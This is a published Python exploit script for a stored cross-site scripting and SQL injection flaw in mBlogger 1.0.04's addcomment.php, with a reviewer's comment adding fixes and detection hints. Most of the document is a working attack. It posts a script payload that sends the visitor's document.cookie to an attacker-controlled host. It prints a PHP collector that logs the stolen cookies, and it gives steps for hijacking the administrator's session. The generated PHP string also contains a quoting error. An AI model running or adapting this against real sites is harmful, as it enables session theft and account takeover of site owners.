mBlogger 1.0.04 (addcomment.php) Persistent XSS Exploit
Posted on 04 September 2010
#!/usr/bin/python
#
# Exploit Title: mBlogger v1.0.04 (addcomment.php) Persistent XSS Exploit
# Date : 04 September 2010
# Author : Ptrace Security (Gianni Gnesa [gnix])
# Contact : research[at]ptrace-security[dot]com
# Software Link: http://sourceforge.net/projects/mblogger/
# Version : 1.0.04
# Tested on : EasyPHP 5.3.1.0 for Windows
#
#
# Description
# ===========
#
# + addcomment.php => An SQL Injection at line 32 allows to insert javascript
#                     that will be executed from the client's browser when he
#                     visits the page viewpost.php?postID=<number>.
#
# 29: $commentAuthor = $_POST['commentAuthor'];
# 30: $commentText = $_POST['commentText'];
# 31: $postID = $_GET['postID'];
# 32: $query = "INSERT INTO comments (user, comment, postid) VALUES
#     ('$commentAuthor', '$commentText', '$postID')";
# 33: if(!mysql_query($query, $connection))
# 34: {
# 35:     die("Error updating post: " . mysql_error());
# 36: }
#
# NOTE(review): the quoted PHP shows two distinct weaknesses in one place.
# Lines 29-32 interpolate raw $_POST / $_GET values straight into the SQL
# string (no prepared statement, no escaping), and, per the description
# above, the stored comment is later rendered by viewpost.php in a way that
# lets embedded markup execute -- presumably echoed without HTML encoding
# (viewpost.php itself is not shown here). The application-side fixes are
# independent of each other: bind the three values with a parameterized
# query, and HTML-encode (htmlspecialchars) comment fields on output. Marking
# the session cookie HttpOnly removes document.cookie as a readable target
# for this class of payload, and a Content-Security-Policy restricting
# img-src / script-src to the site's own origin blocks the outbound beacon
# the payload below relies on.
#
# Detection hints for defenders: the stored comment row contains a literal
# "<script>" tag and an absolute URL to a third-party host; a comment
# moderation rule, DB scan, or WAF signature on commentText catches it, and
# web-server access logs will show a POST to addcomment.php with a
# commentAuthor of "admin" that did not come from an authenticated session.

import sys
import http.client
import urllib.parse


def fatal(message):
    """Print *message* and terminate the process with exit status 1.

    Uses the site-provided builtin ``exit`` rather than ``sys.exit``; the
    effect is the same when run as a script.
    """
    print(message)
    exit(1)


def usage(program):
    """Print the command-line usage banner for *program* (argv[0])."""
    print('Usage : '+ program +' <victim> <mBlogger path> <attacker> ')
    print('Example: '+ program +' localhost /mBlogger/ localhost')
    print(' '+ program +' www.victim.com /path/ www.attacker.com')
    return


def getRemotePHPCode():
    """Return the PHP source text for the receiving endpoint (c.php).

    The generated script reads the ``c`` query parameter, splits it on
    "; ", and appends each ``key=value`` pair (URL-decoded) to ``data.txt``
    next to the script. It is only ever printed by exploit(); nothing here
    executes it. Note that the text is assembled by string concatenation
    exactly as published on the page, quoting included.
    """
    source = '<?php '
    source += '$cs = explode("; ", $_GET['c']); '
    source += '$fp = fopen('data.txt','a'); '
    source += 'if(!empty($cs)) '
    source += ' foreach($cs as $k => $v) { '
    source += ' if(preg_match("/^(.*?)=(.*)$/", $v, $r)) '
    source += ' fwrite($fp,urldecode($r[1])."=".urldecode($r[2])."\r\n"); '
    source += ' else fwrite($fp, "cannot decode $v"); '
    source += ' } '
    source += 'fclose($fp); '
    source += '?>'
    return source


def injectJavascript(victim, path, attacker):
    """POST one comment to ``<path>addcomment.php?postID=1`` on *victim*.

    The comment body is a ``<script>`` tag that creates an Image whose src
    points at ``http://<attacker>/c.php`` with ``document.cookie`` in the
    query string; commentAuthor is hard-coded to ``'admin'`` and postID to
    ``1``. Returns True when the server answers HTTP 200, False otherwise.
    The HTTPConnection is only closed on the 200 path -- on any other
    status the function returns without ``con.close()``.
    """
    payload = '<script> d=new Image; d.src="http://' + attacker
    payload += '/c.php?c="+escape(document.cookie); </script> '
    headers = {'Content-type':'application/x-www-form-urlencoded','Accept':'text/plain'}
    # Form-encoded exactly as a browser would submit the comment form.
    params = urllib.parse.urlencode({'commentAuthor':'admin','commentText':payload,'submitcomment':'Submit'})
    con = http.client.HTTPConnection(victim)
    con.request('POST', path + 'addcomment.php?postID=1', params, headers)
    res = con.getresponse()
    if res.status != 200:
        return False
    con.close()
    return True


def exploit(victim, path, attacker):
    """Drive the full flow: inject the comment, then print c.php and the
    manual follow-up steps.

    Calls fatal() (exit status 1) if injectJavascript() reports a non-200
    response. *path* is expected to carry its own trailing slash; it is
    concatenated directly with the script names.
    """
    print('[+] Injecting Javascript')
    success = injectJavascript(victim, path, attacker)
    if not success:
        fatal('[!] Injection failed')
    print('[+] Generating PHP code for malicious site ')
    print(getRemotePHPCode() + ' ')
    print('[?] Instruction to use this exploit:')
    print(' 1. Save the previous code in http://' + attacker + '/c.php')
    print(' 2. Wait that the administrator visits ')
    print(' http://'+ victim +'/'+ path +'viewpost.php?postID=1')
    print(' 3. Read stolen cookies from http://'+ attacker +'/' + 'data.txt')
    return


# Script entry point: banner, then argument check (exactly three arguments
# after the program name) before dispatching to exploit().
print(' +-----------------------------------------------------------------------------+')
print('| mBlogger v1.0.04 (addcomment.php) Persistent XSS Exploit by Ptrace Security |')
print('+-----------------------------------------------------------------------------+ ')
if len(sys.argv) != 4:
    usage(sys.argv[0])
else:
    exploit(sys.argv[1],sys.argv[2], sys.argv[3])

# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-04]